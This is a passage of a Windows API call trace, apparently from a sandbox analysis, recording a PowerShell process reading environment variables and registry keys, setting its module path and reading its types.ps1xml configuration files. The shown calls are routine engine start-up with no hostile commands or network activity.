	[0289.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.003] CoTaskMemFree (pv=0x471c50) 
	[0289.003] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0289.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.004] CoTaskMemFree (pv=0x471c50) 
	[0289.004] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0289.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.004] CoTaskMemFree (pv=0x471c50) 
	[0291.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0291.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0291.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0291.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.236] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0292.236] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0292.236] CoTaskMemFree (pv=0x471c50) 
	[0292.238] CoTaskMemAlloc (cb=0xcc) returned 0x514040
	[0292.238] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x514040, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0292.238] CoTaskMemFree (pv=0x514040) 
	[0292.238] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d488 | out: phkResult=0x28d488*=0x320) returned 0x0
	[0292.238] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28d40c, lpData=0x0, lpcbData=0x28d408*=0x0 | out: lpType=0x28d40c*=0x2, lpData=0x0, lpcbData=0x28d408*=0x6c) returned 0x0
	[0292.238] CoTaskMemAlloc (cb=0x70) returned 0x4b1000
	[0292.238] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28d3dc, lpData=0x4b1000, lpcbData=0x28d3d8*=0x6c | out: lpType=0x28d3dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x28d3d8*=0x6c) returned 0x0
	[0292.239] CoTaskMemFree (pv=0x4b1000) 
	[0292.239] CoTaskMemAlloc (cb=0xcc) returned 0x514040
	[0292.239] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x514040, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0292.239] CoTaskMemFree (pv=0x514040) 
	[0292.239] CoTaskMemAlloc (cb=0xcc) returned 0x514040
	[0292.239] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x514040, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0292.239] CoTaskMemFree (pv=0x514040) 
	[0292.243] RegCloseKey (hKey=0x320) returned 0x0
	[0292.243] CoTaskMemAlloc (cb=0xcc) returned 0x514040
	[0292.243] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x514040, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0292.243] CoTaskMemFree (pv=0x514040) 
	[0292.243] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d488 | out: phkResult=0x28d488*=0x320) returned 0x0
	[0292.243] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28d40c, lpData=0x0, lpcbData=0x28d408*=0x0 | out: lpType=0x28d40c*=0x0, lpData=0x0, lpcbData=0x28d408*=0x0) returned 0x2
	[0292.243] RegCloseKey (hKey=0x320) returned 0x0
	[0292.251] CoTaskMemAlloc (cb=0x20c) returned 0x50b8c0
	[0292.252] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x50b8c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0292.253] CoTaskMemFree (pv=0x50b8c0) 
	[0292.253] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0292.255] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0292.266] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0292.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.266] CoTaskMemFree (pv=0x471c50) 
	[0292.268] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0292.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.268] CoTaskMemFree (pv=0x471c50) 
	[0293.238] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0293.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.238] CoTaskMemFree (pv=0x471c50) 
	[0293.238] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0293.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.238] CoTaskMemFree (pv=0x471c50) 
	[0293.239] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d278 | out: phkResult=0x28d278*=0x328) returned 0x0
	[0293.241] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x28d28c, lpData=0x0, lpcbData=0x28d288*=0x0 | out: lpType=0x28d28c*=0x1, lpData=0x0, lpcbData=0x28d288*=0x74) returned 0x0
	[0293.241] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x28d1fc, lpData=0x0, lpcbData=0x28d1f8*=0x0 | out: lpType=0x28d1fc*=0x1, lpData=0x0, lpcbData=0x28d1f8*=0x74) returned 0x0
	[0293.241] CoTaskMemAlloc (cb=0x78) returned 0x4b1000
	[0293.241] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x28d1cc, lpData=0x4b1000, lpcbData=0x28d1c8*=0x74 | out: lpType=0x28d1cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x28d1c8*=0x74) returned 0x0
	[0293.241] CoTaskMemFree (pv=0x4b1000) 
	[0293.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x28cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0293.241] SetErrorMode (uMode=0x1) returned 0x1
	[0293.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x28d150 | out: lpFileInformation=0x28d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0293.242] SetErrorMode (uMode=0x1) returned 0x1
	[0293.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0293.242] SetErrorMode (uMode=0x1) returned 0x1
	[0293.242] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d150 | out: lpFileInformation=0x28d150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0293.243] SetErrorMode (uMode=0x1) returned 0x1
	[0293.245] SetErrorMode (uMode=0x1) returned 0x1
	[0293.245] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d150 | out: lpFileInformation=0x28d150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0293.245] SetErrorMode (uMode=0x1) returned 0x1
	[0293.246] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0293.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.246] CoTaskMemFree (pv=0x471c50) 
	[0293.247] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0293.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.247] CoTaskMemFree (pv=0x471c50) 
	[0293.248] GetACP () returned 0x4e4
	[0293.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0293.258] SetErrorMode (uMode=0x1) returned 0x1
	[0293.259] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0293.260] GetFileType (hFile=0x32c) returned 0x1
	[0293.260] SetErrorMode (uMode=0x1) returned 0x1
	[0293.260] GetFileType (hFile=0x32c) returned 0x1
	[0293.263] ReadFile (in: hFile=0x32c, lpBuffer=0x2d6b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2d6b528*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0293.266] ReadFile (in: hFile=0x32c, lpBuffer=0x2d6b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2d6b528*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0293.267] ReadFile (in: hFile=0x32c, lpBuffer=0x2d6b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2d6b528*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0293.267] ReadFile (in: hFile=0x32c, lpBuffer=0x2d6b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2d6b528*, lpNumberOfBytesRead=0x28d088*=0xcf3, lpOverlapped=0x0) returned 1
	[0293.267] ReadFile (in: hFile=0x32c, lpBuffer=0x2d6a983, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2d6a983*, lpNumberOfBytesRead=0x28d088*=0x0, lpOverlapped=0x0) returned 1
	[0293.267] ReadFile (in: hFile=0x32c, lpBuffer=0x2d6b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2d6b528*, lpNumberOfBytesRead=0x28d088*=0x0, lpOverlapped=0x0) returned 1
	[0293.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0293.270] SetErrorMode (uMode=0x1) returned 0x1
	[0293.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d000 | out: lpFileInformation=0x28d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0293.270] SetErrorMode (uMode=0x1) returned 0x1
	[0293.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0293.271] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x32c) returned 0x0
	[0293.271] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d06c, lpData=0x0, lpcbData=0x28d068*=0x0 | out: lpType=0x28d06c*=0x1, lpData=0x0, lpcbData=0x28d068*=0x56) returned 0x0
	[0293.271] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ff890
	[0293.272] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d03c, lpData=0x1b6ff890, lpcbData=0x28d038*=0x56 | out: lpType=0x28d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d038*=0x56) returned 0x0
	[0293.272] CoTaskMemFree (pv=0x1b6ff890) 
	[0293.272] RegCloseKey (hKey=0x32c) returned 0x0
	[0293.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0293.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0294.044] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.053] SetErrorMode (uMode=0x1) returned 0x1
	[0294.053] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0294.053] GetFileType (hFile=0x32c) returned 0x1
	[0294.053] SetErrorMode (uMode=0x1) returned 0x1
	[0294.053] GetFileType (hFile=0x32c) returned 0x1
	[0294.061] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.063] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.066] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.067] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.067] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.068] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.068] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.068] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.068] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.069] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.069] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.070] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.070] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.071] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.071] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.071] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.071] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.071] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.072] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.072] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.072] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.072] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.073] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.073] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.073] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.073] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
